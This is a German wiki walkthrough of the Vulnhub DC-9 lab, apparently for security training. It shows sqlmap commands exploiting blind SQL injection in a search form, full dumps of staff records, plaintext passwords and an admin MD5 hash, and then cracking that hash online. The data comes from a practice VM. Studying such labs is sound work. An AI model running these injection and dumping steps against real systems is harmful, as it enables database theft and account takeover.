Vulnhub dc-9 auslesen der Tabellen
Zur Navigation springen
Zur Suche springen
Alle Tabellen auslesen
- sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B --tables --threads=5
[10:06:01] [INFO] fetching number of tables for database 'users' [10:06:01] [INFO] retrieved: 1 [10:06:01] [INFO] retrieving the length of query output [10:06:01] [INFO] retrieved: 11 [10:06:02] [INFO] retrieved: UserDetails Database: information_schema [76 tables] +---------------------------------------+ | ALL_PLUGINS | | APPLICABLE_ROLES | | CHARACTER_SETS | | CHECK_CONSTRAINTS | | CLIENT_STATISTICS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | ENABLED_ROLES | | ENGINES | | EVENTS | | FILES | | GEOMETRY_COLUMNS | | GLOBAL_STATUS | | GLOBAL_VARIABLES | | INDEX_STATISTICS | | INNODB_BUFFER_PAGE | | INNODB_BUFFER_PAGE_LRU | | INNODB_BUFFER_POOL_STATS | | INNODB_CMP | | INNODB_CMPMEM | | INNODB_CMPMEM_RESET | | INNODB_CMP_PER_INDEX | | INNODB_CMP_PER_INDEX_RESET | | INNODB_CMP_RESET | | INNODB_FT_BEING_DELETED | | INNODB_FT_CONFIG | | INNODB_FT_DEFAULT_STOPWORD | | INNODB_FT_DELETED | | INNODB_FT_INDEX_CACHE | | INNODB_FT_INDEX_TABLE | | INNODB_LOCKS | | INNODB_LOCK_WAITS | | INNODB_METRICS | | INNODB_MUTEXES | | INNODB_SYS_COLUMNS | | INNODB_SYS_DATAFILES | | INNODB_SYS_FIELDS | | INNODB_SYS_FOREIGN | | INNODB_SYS_FOREIGN_COLS | | INNODB_SYS_INDEXES | | INNODB_SYS_SEMAPHORE_WAITS | | INNODB_SYS_TABLES | | INNODB_SYS_TABLESPACES | | INNODB_SYS_TABLESTATS | | INNODB_SYS_VIRTUAL | | INNODB_TABLESPACES_ENCRYPTION | | INNODB_TABLESPACES_SCRUBBING | | INNODB_TRX | | KEY_CACHES | | KEY_COLUMN_USAGE | | PARAMETERS | | PARTITIONS | | PLUGINS | | PROCESSLIST | | PROFILING | | REFERENTIAL_CONSTRAINTS | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | SESSION_STATUS | | SESSION_VARIABLES | | SPATIAL_REF_SYS | | STATISTICS | | SYSTEM_VARIABLES | | TABLES | | TABLESPACES | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TABLE_STATISTICS | | TRIGGERS | | USER_PRIVILEGES | | USER_STATISTICS | | VIEWS | | user_variables | +---------------------------------------+ Database: Staff [2 tables] +---------------------------------------+ | StaffDetails | | Users | +---------------------------------------+ Database: users [1 table] +---------------------------------------+ | UserDetails | +---------------------------------------+ [10:06:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.0.10.58' [*] ending @ 10:06:02 /2023-03-09/
Inhalte von Tabellen auslesen
Datenbank Staff Tabelle StaffDetails
- sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B -D Staff -T StaffDetails --dump
Database: Staff Table: StaffDetails [17 entries] +----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+ | id | email | phone | lastname | reg_date | firstname | position | +----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+ | 1 | marym@example.com | 46478415155456 | Moe | 2019-05-01 17:32:00 | Mary | CEO | | 2 | julied@example.com | 46457131654 | Dooley | 2019-05-01 17:32:00 | Julie | Human Resources | | 3 | fredf@example.com | 46415323 | Flintstone | 2019-05-01 17:32:00 | Fred | Systems Administrator | | 4 | barneyr@example.com | 324643564 | Rubble | 2019-05-01 17:32:00 | Barney | Help Desk | | 5 | tomc@example.com | 802438797 | Cat | 2019-05-01 17:32:00 | Tom | Driver | | 6 | jerrym@example.com | 24342654756 | Mouse | 2019-05-01 17:32:00 | Jerry | Stores | | 7 | wilmaf@example.com | 243457487 | Flintstone | 2019-05-01 17:32:00 | Wilma | Accounts | | 8 | bettyr@example.com | 90239724378 | Rubble | 2019-05-01 17:32:00 | Betty | Junior Accounts | | 9 | chandlerb@example.com | 189024789 | Bing | 2019-05-01 17:32:00 | Chandler | President - Sales | | 10 | joeyt@example.com | 232131654 | Tribbiani | 2019-05-01 17:32:00 | Joey | Janitor | | 11 | rachelg@example.com | 823897243978 | Green | 2019-05-01 17:32:00 | Rachel | Personal Assistant | | 12 | rossg@example.com | 6549638203 | Geller | 2019-05-01 17:32:00 | Ross | Instructor | | 13 | monicag@example.com | 8092432798 | Geller | 2019-05-01 17:32:00 | Monica | Marketing | | 14 | phoebeb@example.com | 43289079824 | Buffay | 2019-05-01 17:32:02 | Phoebe | Assistant Janitor | | 15 | scoots@example.com | 454786464 | McScoots | 2019-05-01 20:16:33 | Scooter | Resident Cat | | 16 | janitor@example.com | 65464646479741 | Trump | 2019-12-23 03:11:39 | Donald | Replacement Janitor | | 17 | janitor2@example.com | 47836546413 | Morrison | 2019-12-24 03:41:04 | Scott | Assistant Replacement Janitor | +----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+ [10:10:47] [INFO] table 'Staff.StaffDetails' dumped to CSV file '/root/.local/share/sqlmap/output/10.0.10.58/dump/Staff/StaffDetails.csv' [10:10:47] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.0.10.58' [*] ending @ 10:10:47 /2023-03-09/
Datenbank users Tabelle UserDetails
- Wir haben die Passwörter im Klartext
- sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B -D users -T UserDetails --dump
Database: users Table: UserDetails [17 entries] +----+------------+---------------+---------------------+-----------+-----------+ | id | lastname | password | reg_date | username | firstname | +----+------------+---------------+---------------------+-----------+-----------+ | 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary | | 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie | | 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred | | 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney | | 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom | | 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry | | 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma | | 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty | | 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler | | 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey | | 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel | | 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross | | 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica | | 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe | | 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter | | 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald | | 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott | +----+------------+---------------+---------------------+-----------+-----------+ [10:47:46] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/10.0.10.58/dump/users/UserDetails.csv' [10:47:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.0.10.58' [*] ending @ 10:47:46 /2023-03-09/
Datenbank Staff Tabelle Users
- sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B -D Staff -T Users --dump
Database: Staff Table: Users [1 entry] +--------+----------------------------------+----------+ | UserID | Password | Username | +--------+----------------------------------+----------+ | 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin | +--------+----------------------------------+----------+ [10:21:20] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/10.0.10.58/dump/Staff/Users.csv' [10:21:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.0.10.58' [*] ending @ 10:21:20 /2023-03-09/
Wie kommen wir ans Passwort?
- Es handelt sich aufgrund der Länge sehr wahrscheinlich um einen MD5 gehashtes Passwort
- Wir können nun mit Hilfe von Rainbow Tabellen das Passwort zurückrechnen.
- Es gibt im Internet genügend Seiten die das leisten.
- Eine davon ist https://crackstation.net
- Das Passwort lautet transorbital1